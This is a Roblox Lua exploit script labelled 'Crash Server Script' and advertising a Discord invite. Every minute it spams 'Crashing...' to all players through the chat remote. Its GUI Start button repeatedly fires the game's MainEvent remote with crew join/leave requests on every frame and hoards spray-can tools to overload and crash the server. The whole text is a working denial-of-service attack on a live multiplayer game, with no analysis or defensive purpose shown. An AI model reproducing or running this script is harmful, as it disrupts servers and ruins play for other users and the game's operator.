game.StarterGui:SetCore(
    "SendNotification",
    {
	Title = "Crash Server Script",
	Text = "Version 1.0",
}
)
print("https://discord.gg/frhn2jd6yt")
end
while true do wait(60) 

local A_1 = "Crashing..." local A_2 = "All" 
local Event = game:GetService("ReplicatedStorage").DefaultChatSystemChatEvents.SayMessageRequest Event:FireServer(A_1, A_2) end

Found=0;local a=Instance.new("ScreenGui")local b=Instance.new("Frame")local c=Instance.new("UICorner")local d=Instance.new("Frame")local e=Instance.new("TextButton")local f=Instance.new("UICorner")local g=Instance.new("UIGradient")local h=Instance.new("TextButton")local i=Instance.new("UICorner")local j=Instance.new("UIGradient")local k=Instance.new("Frame")local l=Instance.new("TextLabel")local m=Instance.new("TextLabel")local n=Instance.new("Frame")a.Name="Hi"a.Parent=game.CoreGui;a.ZIndexBehavior=Enum.ZIndexBehavior.Sibling;b.Parent=a;b.Active=true;b.BackgroundColor3=Color3.fromRGB(21,21,21)b.Position=UDim2.new(0,992,0,326)b.Size=UDim2.new(0,378,0,198)b.Draggable=true;c.CornerRadius=UDim.new(0,4)c.Parent=b;d.Name="Line"d.Parent=b;d.BackgroundColor3=Color3.fromRGB(45,45,45)d.BorderSizePixel=0;d.Position=UDim2.new(-5.65140317e-06,0,0.0920205191,0)d.Size=UDim2.new(0,378,0,1)e.Name="Start"e.Parent=b;e.BackgroundColor3=Color3.fromRGB(39,39,39)e.Position=UDim2.new(0.379079372,0,0.128050506,0)e.Size=UDim2.new(0,91,0,23)e.AutoButtonColor=false;e.Font=Enum.Font.Gotham;e.Text="Start"e.TextColor3=Color3.fromRGB(209,209,209)e.TextSize=14.000;f.CornerRadius=UDim.new(0,3)f.Parent=e;g.Color=ColorSequence.new{ColorSequenceKeypoint.new(0.00,Color3.fromRGB(255,255,255)),ColorSequenceKeypoint.new(1.00,Color3.fromRGB(220,220,220))}g.Rotation=90;g.Parent=e;h.Name="Stop"h.Parent=b;h.BackgroundColor3=Color3.fromRGB(39,39,39)h.Position=UDim2.new(0.377999991,0,0.25,0)h.Size=UDim2.new(0,91,0,23)h.AutoButtonColor=false;h.Font=Enum.Font.Gotham;h.Text="Stop"h.TextColor3=Color3.fromRGB(209,209,209)h.TextSize=14.000;i.CornerRadius=UDim.new(0,3)i.Parent=h;j.Color=ColorSequence.new{ColorSequenceKeypoint.new(0.00,Color3.fromRGB(255,255,255)),ColorSequenceKeypoint.new(1.00,Color3.fromRGB(220,220,220))}j.Rotation=90;j.Parent=h;k.Name="Line"k.Parent=b;k.BackgroundColor3=Color3.fromRGB(45,45,45)k.BorderSizePixel=0;k.Position=UDim2.new(-5.65140317e-06,0,0.496060908,0)k.Size=UDim2.new(0,378,0,1)l.Name="A_1"l.Parent=k;l.BackgroundColor3=Color3.fromRGB(255,255,255)l.BackgroundTransparency=1.000;l.Position=UDim2.new(0.380297422,0,-18.9439259,0)l.Size=UDim2.new(0,90,0,16)l.Font=Enum.Font.Gotham;l.Text="Stats"l.TextColor3=Color3.fromRGB(186,186,186)l.TextSize=16.000;m.Name="A_2"m.Parent=k;m.BackgroundColor3=Color3.fromRGB(255,255,255)m.BackgroundTransparency=1.000;m.Position=UDim2.new(0.380297422,0,8.05607605,0)m.Size=UDim2.new(0,90,0,16)m.Font=Enum.Font.Gotham;m.Text="0/1250"m.TextColor3=Color3.fromRGB(186,186,186)m.TextSize=16.000;n.Name="Line"n.Parent=b;n.BackgroundColor3=Color3.fromRGB(45,45,45)n.BorderSizePixel=0;n.Position=UDim2.new(-5.65140317e-06,0,0.910202324,0)n.Size=UDim2.new(0,378,0,1)local function o()local p=Instance.new('LocalScript',e)e.MouseButton1Down:Connect(function()local l=game.Players.LocalPlayer.Character.HumanoidRootPart.CFrame+Vector3.new(0,123,0)local m=9.998e+9;local q=game.TweenService:Create(game.Players.LocalPlayer.Character.HumanoidRootPart,TweenInfo.new(m),{CFrame=l})q:Play()game.Players.LocalPlayer.Character.BodyEffects:FindFirstChild("K.O"):Destroy()game.RunService:BindToRenderStep("Crash",0,function()game.ReplicatedStorage.MainEvent:FireServer("JoinCrew",15635946)game.ReplicatedStorage.MainEvent:FireServer("LeaveCrew")if game.Players.LocalPlayer.Backpack:FindFirstChild("[SprayCan]")then game.Players.LocalPlayer.Backpack:FindFirstChild("[SprayCan]").Parent=game.Players.LocalPlayer.Character;Found=Found+1 end;if Found>1250 then for r,s in pairs(game.Players.LocalPlayer.Character:GetChildren())do if s:IsA("BasePart")then s:Destroy()end end end end)end)end;coroutine.wrap(o)()local function t()local p=Instance.new('LocalScript',h)h.MouseButton1Down:Connect(function()game.RunService:UnbindFromRenderStep("Crash")for r,s in pairs(game.Players.LocalPlayer.Character:GetChildren())do if s:IsA("BasePart")then s:Destroy()end end;wait()Found=0 end)end;coroutine.wrap(t)()local function u()local p=Instance.new('LocalScript',m)game.RunService:BindToRenderStep("Crash",0,function()m.Text=Found.."/1250"end)end;coroutine.wrap(u)()
